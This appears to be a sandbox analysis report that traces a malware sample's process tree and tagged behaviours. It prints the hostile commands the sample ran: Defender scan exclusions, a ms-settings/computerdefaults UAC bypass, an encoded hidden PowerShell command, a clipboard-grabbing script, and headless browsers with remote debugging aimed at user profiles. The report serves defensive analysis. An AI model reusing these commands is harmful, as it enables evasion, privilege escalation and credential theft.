PID 1276 wrote to memory of 4304	1276	skotes.exe	104
PID 4304 wrote to memory of 384	4304	client.exe	105
PID 4304 wrote to memory of 384	4304	client.exe	105
PID 384 wrote to memory of 4560	384	client.exe	106
PID 384 wrote to memory of 4560	384	client.exe	106
PID 384 wrote to memory of 4320	384	client.exe	108
PID 384 wrote to memory of 4320	384	client.exe	108
PID 384 wrote to memory of 5044	384	client.exe	109
PID 384 wrote to memory of 5044	384	client.exe	109
PID 4320 wrote to memory of 3536	4320	chrome.exe	110
PID 4320 wrote to memory of 3536	4320	chrome.exe	110
PID 5044 wrote to memory of 2016	5044	msedge.exe	111
PID 5044 wrote to memory of 2016	5044	msedge.exe	111
PID 1276 wrote to memory of 2564	1276	skotes.exe	112
PID 1276 wrote to memory of 2564	1276	skotes.exe	112
PID 1276 wrote to memory of 2564	1276	skotes.exe	112
PID 5044 wrote to memory of 1820	5044	msedge.exe	114
PID 5044 wrote to memory of 1820	5044	msedge.exe	114
PID 5044 wrote to memory of 1820	5044	msedge.exe	114
PID 5044 wrote to memory of 1820	5044	msedge.exe	114
PID 5044 wrote to memory of 1820	5044	msedge.exe	114
PID 5044 wrote to memory of 1820	5044	msedge.exe	114
PID 5044 wrote to memory of 1820	5044	msedge.exe	114
PID 5044 wrote to memory of 1820	5044	msedge.exe	114
PID 5044 wrote to memory of 1820	5044	msedge.exe	114
PID 5044 wrote to memory of 1820	5044	msedge.exe	114
PID 5044 wrote to memory of 1820	5044	msedge.exe	114
PID 5044 wrote to memory of 1820	5044	msedge.exe	114
PID 5044 wrote to memory of 1820	5044	msedge.exe	114
PID 5044 wrote to memory of 1820	5044	msedge.exe	114
PID 5044 wrote to memory of 1820	5044	msedge.exe	114
PID 5044 wrote to memory of 1820	5044	msedge.exe	114

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5628	attrib.exe
5588	attrib.exe
5620	attrib.exe

C:\Users\Admin\AppData\Local\Temp\3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d_Sigmanly.exe
"C:\Users\Admin\AppData\Local\Temp\3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d_Sigmanly.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3208
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1276
- - C:\Users\Admin\AppData\Local\Temp\1020416001\SdVB3P2.exe
    "C:\Users\Admin\AppData\Local\Temp\1020416001\SdVB3P2.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5088
- - C:\Users\Admin\AppData\Local\Temp\1020826001\I0XmI2t.exe
    "C:\Users\Admin\AppData\Local\Temp\1020826001\I0XmI2t.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:884
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXAAyAHoAdgBrAG0AcQAyAHIANQBrAGQAUQBVAEwAUwBGAFAATwBVACcA
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4684
  - - C:\Users\Admin\AppData\Roaming\2zvkmq2r5kdQULSFPOU\DJj.exe
      "C:\Users\Admin\AppData\Roaming\2zvkmq2r5kdQULSFPOU\DJj.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4220
- - C:\Users\Admin\AppData\Local\Temp\1020934001\mdjw5me.exe
    "C:\Users\Admin\AppData\Local\Temp\1020934001\mdjw5me.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4660
  - - C:\Users\Admin\AppData\Local\Temp\1020934001\mdjw5me.exe
      "C:\Users\Admin\AppData\Local\Temp\1020934001\mdjw5me.exe"
      4⤵
      Executes dropped EXE
      PID:1860
  - - C:\Users\Admin\AppData\Local\Temp\1020934001\mdjw5me.exe
      "C:\Users\Admin\AppData\Local\Temp\1020934001\mdjw5me.exe"
      4⤵
      Executes dropped EXE
      PID:900
  - - C:\Users\Admin\AppData\Local\Temp\1020934001\mdjw5me.exe
      "C:\Users\Admin\AppData\Local\Temp\1020934001\mdjw5me.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:392
- - C:\Users\Admin\AppData\Local\Temp\1021127001\client.exe
    "C:\Users\Admin\AppData\Local\Temp\1021127001\client.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4304
  - - C:\Users\Admin\AppData\Local\Temp\1021127001\client.exe
      "C:\Users\Admin\AppData\Local\Temp\1021127001\client.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:384
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:4560
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session --remote-debugging-port=8922 --remote-allow-origins=* --headless=new "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data"
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:4320
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe05ccc40,0x7fffe05ccc4c,0x7fffe05ccc58
        6⤵
        
        PID:3536
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless=new --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1932,i,17931413247667212783,18141243784861822801,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1928 /prefetch:2
        6⤵
        
        PID:2144
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=2168,i,17931413247667212783,18141243784861822801,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2376 /prefetch:3
        6⤵
        
        PID:4384
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=2216,i,17931413247667212783,18141243784861822801,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2600 /prefetch:8
        6⤵
        
        PID:3816
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=8922 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3700,i,17931413247667212783,18141243784861822801,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3712 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:1884
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=8922 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3720,i,17931413247667212783,18141243784861822801,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3760 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3808
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=8922 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4140,i,17931413247667212783,18141243784861822801,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4472 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2972
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=4760,i,17931413247667212783,18141243784861822801,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4772 /prefetch:8
        6⤵
        
        PID:2076
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=4948,i,17931413247667212783,18141243784861822801,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4952 /prefetch:8
        6⤵
        
        PID:5192
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=4776,i,17931413247667212783,18141243784861822801,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4784 /prefetch:8
        6⤵
        
        PID:5360
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=4804,i,17931413247667212783,18141243784861822801,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4772 /prefetch:8
        6⤵
        
        PID:5408
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=4796,i,17931413247667212783,18141243784861822801,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5236 /prefetch:8
        6⤵
        
        PID:5492
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=4952,i,17931413247667212783,18141243784861822801,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5348 /prefetch:8
        6⤵
        
        PID:5872
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --no-appcompat-clear --remote-debugging-port=8922 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5164,i,17931413247667212783,18141243784861822801,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4840 /prefetch:2
        6⤵
        Uses browser remote debugging
        
        PID:6776
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session --remote-debugging-port=8701 --remote-allow-origins=* --headless=new "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data"
        5⤵
        Uses browser remote debugging
        Suspicious use of WriteProcessMemory
        
        PID:5044
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffe07246f8,0x7fffe0724708,0x7fffe0724718
        6⤵
        
        PID:2016
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1504,13796909097409116605,2568715549772677960,131072 --disable-features=PaintHolding --headless=new --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1512 /prefetch:2
        6⤵
        
        PID:1820
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1504,13796909097409116605,2568715549772677960,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1852 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3540
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=8701 --allow-pre-commit-input --field-trial-handle=1504,13796909097409116605,2568715549772677960,131072 --disable-features=PaintHolding --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1952 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3284
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        5⤵
        
        PID:7308
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:7388
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
        5⤵
        
        PID:7316
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM msedge.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:7396
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command " Add-MpPreference -ExclusionExtension '.ps1', '.tmp', '.py' Add-MpPreference -ExclusionPath \"$env:TEMP\", \"$env:APPDATA\" "
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:7500
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:7604
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Powershell\Get-Clipboard.ps1
        5⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:7804
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oro41si4\oro41si4.cmdline"
        6⤵
        
        PID:8128
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79BA.tmp" "c:\Users\Admin\AppData\Local\Temp\oro41si4\CSCE07E7805549F4A608A206CEAFEFE808.TMP"
        7⤵
        
        PID:1580
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig"
        5⤵
        
        PID:7912
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig
        6⤵
        Gathers network information
        
        PID:8020
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig /all"
        5⤵
        
        PID:8044
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        6⤵
        Gathers network information
        
        PID:8096
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        5⤵
        
        PID:8140
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:8188
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        
        PID:3924
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4520
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig"
        5⤵
        
        PID:6384
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig
        6⤵
        Gathers network information
        
        PID:6332
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig /all"
        5⤵
        
        PID:6316
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        6⤵
        Gathers network information
        
        PID:6268
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        5⤵
        
        PID:6240
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:6188
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\Admin\AppData\Local\Temp\1021127001\client.exe" /f"
        5⤵
        
        PID:6492
      - C:\Windows\system32\reg.exe
        
        reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\Admin\AppData\Local\Temp\1021127001\client.exe" /f
        6⤵
        Modifies registry class
        Modifies registry key
        
        PID:6552
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f"
        5⤵
        
        PID:6568
      - C:\Windows\system32\reg.exe
        
        reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f
        6⤵
        Modifies registry class
        Modifies registry key
        
        PID:6636
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"
        5⤵
        
        PID:6648
      - C:\Windows\system32\wevtutil.exe
        
        wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6712
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "computerdefaults --nouacbypass"
        5⤵
        
        PID:6728
      - C:\Windows\system32\ComputerDefaults.exe
        
        computerdefaults --nouacbypass
        6⤵
        
        PID:6760
        
        C:\Users\Admin\AppData\Local\Temp\1021127001\client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1021127001\client.exe"
        7⤵
        Executes dropped EXE
        
        PID:6824
        
        C:\Users\Admin\AppData\Local\Temp\1021127001\client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1021127001\client.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of AdjustPrivilegeToken
        
        PID:4612
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        9⤵
        
        PID:4916
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session --remote-debugging-port=8936 --remote-allow-origins=* --headless=new "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data"
        9⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:2812
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd78fcc40,0x7fffd78fcc4c,0x7fffd78fcc58
        10⤵
        
        PID:228
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless=new --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1932,i,4212837604006277852,4410782281667388020,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1928 /prefetch:2
        10⤵
        
        PID:5992
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=1772,i,4212837604006277852,4410782281667388020,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2208 /prefetch:3
        10⤵
        
        PID:6020
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=2260,i,4212837604006277852,4410782281667388020,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2488 /prefetch:8
        10⤵
        
        PID:5376
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=8936 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3764,i,4212837604006277852,4410782281667388020,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3808 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:5776
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=8936 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3772,i,4212837604006277852,4410782281667388020,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3784 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:5788
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=8936 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4492,i,4212837604006277852,4410782281667388020,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4448 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:5684
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
